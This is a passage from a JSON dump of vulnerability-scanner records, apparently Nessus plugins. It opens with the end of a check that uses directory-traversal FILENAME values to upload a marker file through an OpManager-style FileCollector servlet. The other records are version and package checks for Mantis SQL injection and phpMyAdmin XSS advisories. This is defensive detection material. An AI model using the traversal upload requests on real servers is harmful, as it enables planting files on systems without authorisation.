\"servlets/FileCollector?AGENTKEY=123&FILENAME=..\\\\..\\\\..\\\\webclient\\\\common\\\\css\\\\\"+file,\n \"servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../webclient/common/css&FILENAME=\"+file,\n 
\"servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=..\\\\..\\\\..\\\\webclient\\\\common\\\\css&FILENAME=\"+file\n);\n\nuploaded = FALSE;\nexecuted = FALSE;\nvecurl = \"\";\nforeach vector (vectors)\n{\n\n res = http_send_recv3(\n port : port,\n method : \"POST\",\n item : dir+vector,\n data : postdata,\n content_type : \"text/html\",\n exit_on_fail : TRUE\n );\n exp_request = http_last_sent_request();\n\n # Try and access our uploaded file\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + \"webclient/common/css/\" +file,\n exit_on_fail : TRUE\n );\n\n # Only need to upload one file\n if(\"Nessus Check: \"+unique >< res[2])\n {\n uploaded = TRUE;\n vecurl = vector;\n break;\n }\n}\n\nif (uploaded)\n{\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n file : dir+\"webclient/common/css/\"+file,\n line_limit : 10,\n request : make_list(exp_request),\n output : chomp(res[2]),\n attach_type : 'text/plain'\n );\n} else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:48:42", "description": "Multiple SQL injection vulnerabilities have been discovered in the Mantis bug tracking system.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-22T00:00:00", "type": "nessus", "title": "Debian DSA-3030-1 : mantis - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:mantis", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-3030.NASL", "href": "https://www.tenable.com/plugins/nessus/77763", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3030. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77763);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-1608\", \"CVE-2014-1609\");\n script_bugtraq_id(65445, 65461);\n script_xref(name:\"DSA\", value:\"3030\");\n\n script_name(english:\"Debian DSA-3030-1 : mantis - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple SQL injection vulnerabilities have been discovered in the\nMantis bug tracking system.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/mantis\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-3030\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the mantis packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 1.2.11-1.2+deb7u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mantis\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/20\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"mantis\", reference:\"1.2.11-1.2+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:09:07", "description": "According to its self-reported version number, the phpMyAdmin application hosted on the remote web server is 4.0.x prior to 4.0.10.2, 4.1.x prior to 4.1.14.3, or 4.2.x prior to 4.2.7.1. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple cross-site scripting vulnerabilities exist in the browser table, ENUM editor, monitor, query charts, and table relations pages. (CVE-2014-5273)\n\n - A flaw exists in the view operation page that allows a cross-site scripting attack. Note that this does not affect the 4.0.x releases. 
(CVE-2014-5274)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2014-08-21T00:00:00", "type": "nessus", "title": "phpMyAdmin 4.0.x < 4.0.10.2 / 4.1.x < 4.1.14.3 / 4.2.x < 4.2.7.1 Multiple XSS Vulnerabilities (PMASA-2014-8 - PMASA-2014-9)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin"], "id": "PHPMYADMIN_PMASA_2014_9.NASL", "href": "https://www.tenable.com/plugins/nessus/77305", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77305);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-5273\", \"CVE-2014-5274\");\n script_bugtraq_id(69268, 69269);\n\n script_name(english:\"phpMyAdmin 4.0.x < 4.0.10.2 / 4.1.x < 4.1.14.3 / 4.2.x < 4.2.7.1 Multiple XSS Vulnerabilities (PMASA-2014-8 - PMASA-2014-9)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the phpMyAdmin\napplication hosted on the remote web server is 4.0.x prior to\n4.0.10.2, 4.1.x prior to 4.1.14.3, or 4.2.x prior to 4.2.7.1. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple cross-site scripting vulnerabilities exist in\n the browser table, ENUM editor, monitor, query charts,\n and table relations pages. (CVE-2014-5273)\n\n - A flaw exists in the view operation page that allows a\n cross-site scripting attack. Note that this does not\n affect the 4.0.x releases. 
(CVE-2014-5274)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-8.php\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-9.php\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/647c9d12e33a6b64e1c3ff7487f72696bdf2dccb\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fea869a4\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/2c45d7caa614afd71dbe3d0f7270f51ce5569614\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1e1c0339\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/cd9f302bf7f91a160fe7080f9a612019ef847f1c\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b49d1fce\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/90ddeecf60fc029608b972e490b735f3a65ed0cb\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?274b0651\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/3ffc967fb60cf2910cc2f571017e977558c67821\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cec3b0ca\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/0cd293f5e13aa245e4a57b8d373597cc0e421b6f\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b6efd2e6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either upgrade to phpMyAdmin 4.0.10.2 / 4.1.14.3 / 4.2.7.1 or later,\nor apply the patches from the referenced links.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n 
script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/21\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_require_keys(\"www/PHP\", \"www/phpMyAdmin\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_install_from_kb(appname:\"phpMyAdmin\", port:port, exit_on_fail:TRUE);\ndir = install['dir'];\nurl = build_url(qs:dir, port:port);\nversion = install['ver'];\n\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, \"phpMyAdmin\", url);\nif (version =~ \"^4(\\.[012])?$\") audit(AUDIT_VER_NOT_GRANULAR, \"phpMyAdmin\", port, version);\nif (version !~ \"^4\\.[012][^0-9]\") audit(AUDIT_WEB_APP_NOT_INST, \"phpMyAdmin 4.0.x / 4.1.x / 4.2.x\", port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nre = make_array(\n -2, \"-beta(\\d+)\",\n -1, \"-rc(\\d+)\"\n);\n\n# Affected version\n# 4.0.x < 4.0.10.2\n# 4.1.x < 4.1.14.3\n# 4.2.x < 4.2.7.1\n\nif (version =~ \"^4\\.0\\.\")\n{\n cut_off = 
'4.0.0';\n fixed_ver = '4.0.10.2';\n}\n\nif (version =~ \"^4\\.1\\.\")\n{\n cut_off = '4.1.0';\n fixed_ver = '4.1.14.3';\n}\n\nif (version =~ \"^4\\.2\\.\")\n{\n cut_off = '4.2.0';\n fixed_ver = '4.2.7.1';\n}\n\nif (\n ver_compare(ver:version, fix:cut_off, regexes:re) >= 0 &&\n ver_compare(ver:version, fix:fixed_ver, regexes:re) == -1\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_ver +\n '\\n';\n security_note(port:port, extra:report);\n }\n else security_note(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"phpMyAdmin\", url, version);\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:28", "description": "Versions of phpMyAdmin earlier than 4.0.10.2, 4.1.14.3, or 4.2.7.1 are unpatched for cross-site scripting vulnerabilities on the following pages:\n\n - The view operations page\n - browse table\n - ENUM editor\n - monitor\n - query charts and table relations pages\n\nNote that these vulnerabilities may only be leveraged by a user who is logged in.", "cvss3": {"score": 5.4, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"}, "published": "2014-10-02T00:00:00", "type": "nessus", "title": "phpMyAdmin 4.0.x < 4.0.10.2 / 4.1.x < 4.1.14.3 / 4.2.x < 4.2.7.1 Multiple XSS (PMASA-2014-8, PMASA-2014-9)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*"], "id": "8408.PRM", "href": "https://www.tenable.com/plugins/nnm/8408", "sourceData": "Binary data 8408.prm", "cvss": {"score": 5.5, "vector": "CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:35", "description": "Updated phpmyadmin package fixes security vulnerabilities :\n\nIn phpMyAdmin before 4.1.14.3, multiple XSS vulnerabilities exist in browse 
table, ENUM editor, monitor, query charts and table relations pages (CVE-2014-5273).\n\nIn phpMyAdmin before 4.1.14.3, with a crafted view name it is possible to trigger an XSS when dropping the view in view operation page (CVE-2014-5274).", "cvss3": {"score": null, "vector": null}, "published": "2014-09-12T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : phpmyadmin (MDVSA-2014:164)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:phpmyadmin", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2014-164.NASL", "href": "https://www.tenable.com/plugins/nessus/77643", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:164. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77643);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-5273\", \"CVE-2014-5274\");\n script_bugtraq_id(69268, 69269);\n script_xref(name:\"MDVSA\", value:\"2014:164\");\n\n script_name(english:\"Mandriva Linux Security Advisory : phpmyadmin (MDVSA-2014:164)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated phpmyadmin package fixes security vulnerabilities :\n\nIn phpMyAdmin before 4.1.14.3, multiple XSS vulnerabilities exist in\nbrowse table, ENUM editor, monitor, query charts and table relations\npages (CVE-2014-5273).\n\nIn phpMyAdmin before 4.1.14.3, with a crafted view name it 
is possible\nto trigger an XSS when dropping the view in view operation page\n(CVE-2014-5274).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0344.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpmyadmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"phpmyadmin-4.2.8-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:58", "description": "phpMyAdmin 4.2.7.1 (2014-08-17) ===============================\n\n - [security] XSS in table browse page\n\n - [security] Self-XSS in enum value editor\n\n - [security] Self-XSSes in monitor\n\n - [security] Self-XSS in query charts\n\n - [security] XSS in view operations page\n\n - [security] XSS in relation view\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-08-29T00:00:00", "type": "nessus", "title": "Fedora 19 : phpMyAdmin-4.2.7.1-1.fc19 (2014-9534)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpMyAdmin", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-9534.NASL", "href": "https://www.tenable.com/plugins/nessus/77424", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9534.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77424);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-5273\", \"CVE-2014-5274\");\n script_bugtraq_id(69268, 69269);\n script_xref(name:\"FEDORA\", value:\"2014-9534\");\n\n script_name(english:\"Fedora 19 : phpMyAdmin-4.2.7.1-1.fc19 (2014-9534)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"phpMyAdmin 4.2.7.1 (2014-08-17) ===============================\n\n - [security] XSS in table browse page\n\n - [security] Self-XSS in enum value editor\n\n - [security] Self-XSSes in monitor\n\n - [security] Self-XSS in query charts\n\n - [security] XSS in view operations page\n\n - [security] XSS in relation view\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1130865\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1130866\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-August/137126.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e78ccb41\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"phpMyAdmin-4.2.7.1-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:45", "description": "phpMyAdmin 4.2.7.1 (2014-08-17) ===============================\n\n - [security] XSS in table browse page\n\n - [security] Self-XSS in enum value editor\n\n - [security] Self-XSSes in monitor\n\n - [security] Self-XSS in query charts\n\n - [security] XSS in view operations page\n\n - [security] XSS in relation view\n\nNote that Tenable Network Security has extracted the 
preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-08-25T00:00:00", "type": "nessus", "title": "Fedora 20 : phpMyAdmin-4.2.7.1-1.fc20 (2014-9555)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpMyAdmin", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-9555.NASL", "href": "https://www.tenable.com/plugins/nessus/77362", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9555.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77362);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-5273\", \"CVE-2014-5274\");\n script_bugtraq_id(69268, 69269);\n script_xref(name:\"FEDORA\", value:\"2014-9555\");\n\n script_name(english:\"Fedora 20 : phpMyAdmin-4.2.7.1-1.fc20 (2014-9555)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"phpMyAdmin 4.2.7.1 (2014-08-17) ===============================\n\n - [security] XSS in table browse page\n\n - [security] Self-XSS in enum value editor\n\n - [security] Self-XSSes in monitor\n\n - [security] Self-XSS in query charts\n\n - [security] XSS in view operations page\n\n - [security] XSS in relation view\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security 
advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1130865\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1130866\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-August/136988.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?51d8eacf\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"phpMyAdmin-4.2.7.1-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 